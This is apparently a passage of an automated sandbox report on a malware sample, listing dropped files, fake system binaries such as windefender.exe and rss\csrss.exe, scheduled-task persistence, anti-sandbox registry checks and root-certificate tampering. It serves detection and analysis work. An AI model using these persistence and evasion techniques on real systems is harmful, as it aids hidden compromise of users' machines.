File created | C:\Program Files\Oracle\VirtualBox\VBoxDTrace.exe | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\SDL.dll | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\VMMR0.r0 | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\VBoxCAPI.dll | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\VBoxHostChannel.dll | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\VBoxNetDHCP.exe | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_ca.qm | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_es.qm | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_it.qm | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\Qt5WidgetsVBox.dll | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\VBoxVMM.dll | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\UnattendedTemplates\lgw_postinstall.sh | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_nl.qm | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\VBoxHeadless.exe | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\VBoxGuestAdditions.iso | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\VBoxSDL.dll | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\drivers\vboxdrv\VBoxDrv.cat | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\VBoxDragAndDropSvc.dll | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\VBoxNetDHCP.dll | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\VBoxWebSrv.exe | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\x86\msvcp100.dll | msiexec.exe
File created | C:\Program Files (x86)\qIYKRzUEasUn\fQymhqv.dll | gfswPFz.exe
File created | C:\Program Files\Oracle\VirtualBox\License_en_US.rtf | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\Qt5WinExtrasVBox.dll | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\VBoxDD2.dll | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\drivers\vboxdrv\VBoxDrv.inf | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\VBoxHeadless.dll | msiexec.exe
File created | C:\Program Files (x86)\ecOJmsgAHWlsC\zInvEZW.xml | gfswPFz.exe
File created | C:\Program Files\Oracle\VirtualBox\sdk\install\vboxapi\__init__.py | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\DbgPlugInDiggers.dll | msiexec.exe
File created | C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\DkMDOrt.dll | gfswPFz.exe
File created | C:\Program Files\Oracle\VirtualBox\VBoxNetNAT.dll | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_id.qm | msiexec.exe
File created | C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\qYUJOOH.xml | gfswPFz.exe
File created | C:\Program Files\Oracle\VirtualBox\Qt5OpenGLVBox.dll | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\VBoxDD.dll | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\drivers\vboxdrv\VBoxDrv.sys | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\VBoxSDL.exe | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_de.qm | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_th.qm | msiexec.exe
File created | C:\Program Files\Oracle\VirtualBox\nls\VirtualBox_zh_TW.qm | msiexec.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | gfswPFz.exe
File created | C:\Program Files\Oracle\VirtualBox\VBoxSupLib.dll | msiexec.exe
Drops file in Windows directory 21 IoCs
Processes:
- File created C:\Windows\Tasks\explorta.job (fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe)
- File opened for modification C:\Windows\rss (91jwA6wQnD20jEFlNGHkRWzr.exe)
- File created C:\Windows\Installer\e588642.msi (msiexec.exe)
- File opened for modification C:\Windows\Installer\ (msiexec.exe)
- File created C:\Windows\Installer\SourceHash{B4A28DF2-D2C0-4956-A34A-4D77BA2932CC} (msiexec.exe)
- File created C:\Windows\Tasks\chrosha.job (amert.exe)
- File opened for modification C:\Windows\rss (uon7YhUxbxygHEmdqaGh1jhy.exe)
- File created C:\Windows\windefender.exe (csrss.exe)
- File opened for modification C:\Windows\Installer\MSI8EAF.tmp (msiexec.exe)
- File opened for modification C:\Windows\Installer\MSI9C0E.tmp (msiexec.exe)
- File created C:\Windows\rss\csrss.exe (91jwA6wQnD20jEFlNGHkRWzr.exe)
- File opened for modification C:\Windows\windefender.exe (csrss.exe)
- File created C:\Windows\Tasks\yfARWRprRqUFWeTGf.job (schtasks.exe)
- File created C:\Windows\Tasks\JHJXtPPPvDXVqpH.job (schtasks.exe)
- File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log (msiexec.exe)
- File created C:\Windows\Installer\inprogressinstallinfo.ipi (msiexec.exe)
- File opened for modification C:\Windows\Installer\MSI8D47.tmp (msiexec.exe)
- File created C:\Windows\Tasks\biPxHmULFllsbMgnpt.job (schtasks.exe)
- File created C:\Windows\rss\csrss.exe (uon7YhUxbxygHEmdqaGh1jhy.exe)
- File created C:\Windows\Tasks\aNyMQclguOCSCcjxm.job (schtasks.exe)
- File opened for modification C:\Windows\Installer\e588642.msi (msiexec.exe)
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
- pid 6332: sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
Processes:
- pid 6476, target pid 3564: WerFault.exe (target process ZleUyzy9WRVICP6WvVkSUjzN.exe)
- pid 4780, target pid 5876: WerFault.exe (target process u2r0.0.exe)
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
- Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (u2r0.3.exe)
- Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (u2r0.3.exe)
- Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI (u2r0.3.exe)
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (u2r0.0.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (u2r0.0.exe)
-
Creates scheduled task(s) 1 TTPs 17 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
- schtasks.exe pids: 5280, 4564, 7156, 7064, 5704, 1512, 5476, 5212, 2080, 2200, 1316, 3556, 6064, 2228, 2352, 5700, 1536
-
Enumerates system info in registry 2 TTPs 12 IoCs
Processes:
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (Install.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (chrome.exe)
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (Install.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (Install.exe)
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (rundll32.exe)
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (chrome.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (chrome.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (chrome.exe)
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (chrome.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (chrome.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (rundll32.exe)
- Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (Install.exe)
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exewindefender.exeuon7YhUxbxygHEmdqaGh1jhy.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exechrome.exegfswPFz.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" uon7YhUxbxygHEmdqaGh1jhy.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-384 = "Namibia Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Key 
created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" uon7YhUxbxygHEmdqaGh1jhy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-841 = "Argentina Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-771 = "Montevideo Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 
powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" uon7YhUxbxygHEmdqaGh1jhy.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-2631 = "Norfolk Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" uon7YhUxbxygHEmdqaGh1jhy.exe Set value (str) 
\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" uon7YhUxbxygHEmdqaGh1jhy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-411 = "E. 
Africa Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-2571 = "Turks and Caicos Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix gfswPFz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-3051 = 
"Qyzylorda Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe -
Modifies registry class 2 IoCs
Processes:
- Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3906287020-2915474608-1755617787-1000\{CBE6D7F6-EB26-4A9E-A8C4-A6EF2F50B9B5} (chrome.exe)
- Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3906287020-2915474608-1755617787-1000\{9B399653-2FD6-46FC-ABB5-D38CD87273E8} (chrome.exe)
-
Processes:
2MYMzGM0Ir1ZgoCjigWHeOoy.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 2MYMzGM0Ir1ZgoCjigWHeOoy.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301
ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54e
d9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e 2MYMzGM0Ir1ZgoCjigWHeOoy.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 2MYMzGM0Ir1ZgoCjigWHeOoy.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
- pid 1876: mstc.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exeexplorta.exeamert.exechrosha.exeexplorta.exechrome.exe06feb1f97d.exepowershell.exepowershell.exeu2r0.0.exepowershell.exepowershell.exeuon7YhUxbxygHEmdqaGh1jhy.exe91jwA6wQnD20jEFlNGHkRWzr.exerun.exepowershell.exepowershell.exepowershell.exerundll32.exepowershell.exepowershell.execmd.exepid process 2004 fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe 2004 fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe 5064 explorta.exe 5064 explorta.exe 2264 amert.exe 2264 amert.exe 4016 chrosha.exe 4016 chrosha.exe 3572 explorta.exe 3572 explorta.exe 4708 chrome.exe 4708 chrome.exe 3036 06feb1f97d.exe 3036 06feb1f97d.exe 5572 powershell.exe 5572 powershell.exe 5540 powershell.exe 5540 powershell.exe 5540 powershell.exe 5572 powershell.exe 5876 u2r0.0.exe 5876 u2r0.0.exe 5804 powershell.exe 5804 powershell.exe 5804 powershell.exe 5836 powershell.exe 5836 powershell.exe 5836 powershell.exe 5156 uon7YhUxbxygHEmdqaGh1jhy.exe 5156 uon7YhUxbxygHEmdqaGh1jhy.exe 5336 91jwA6wQnD20jEFlNGHkRWzr.exe 5336 91jwA6wQnD20jEFlNGHkRWzr.exe 2528 run.exe 2528 run.exe 2528 run.exe 5364 powershell.exe 5364 powershell.exe 5364 powershell.exe 5488 powershell.exe 5488 powershell.exe 5268 powershell.exe 5268 powershell.exe 5268 powershell.exe 5488 powershell.exe 6608 rundll32.exe 6608 rundll32.exe 6608 rundll32.exe 6608 rundll32.exe 6608 rundll32.exe 6608 rundll32.exe 6632 powershell.exe 6632 powershell.exe 6632 powershell.exe 6608 rundll32.exe 6608 rundll32.exe 6608 rundll32.exe 6608 rundll32.exe 6736 powershell.exe 6736 powershell.exe 6736 powershell.exe 5496 cmd.exe 5496 cmd.exe 5496 cmd.exe 5496 cmd.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
- pid 2528: run.exe
- pid 5496: cmd.exe
- pid 5496: cmd.exe
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
Processes:
- pid 4708: chrome.exe (4 occurrences)
- pid 5684: chrome.exe (4 occurrences)
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
chrome.exefile300un.exeregasm.exemstc.exepowershell.exepowershell.exepowershell.exepowershell.exeuon7YhUxbxygHEmdqaGh1jhy.exe91jwA6wQnD20jEFlNGHkRWzr.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeDebugPrivilege 368 file300un.exe Token: SeDebugPrivilege 5056 regasm.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeDebugPrivilege 1876 mstc.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeDebugPrivilege 5540 powershell.exe Token: SeDebugPrivilege 5572 powershell.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeDebugPrivilege 5804 powershell.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeDebugPrivilege 5836 powershell.exe Token: SeDebugPrivilege 5156 uon7YhUxbxygHEmdqaGh1jhy.exe Token: SeDebugPrivilege 5336 91jwA6wQnD20jEFlNGHkRWzr.exe Token: SeImpersonatePrivilege 5156 uon7YhUxbxygHEmdqaGh1jhy.exe Token: SeImpersonatePrivilege 5336 91jwA6wQnD20jEFlNGHkRWzr.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeDebugPrivilege 5364 powershell.exe Token: SeDebugPrivilege 5488 
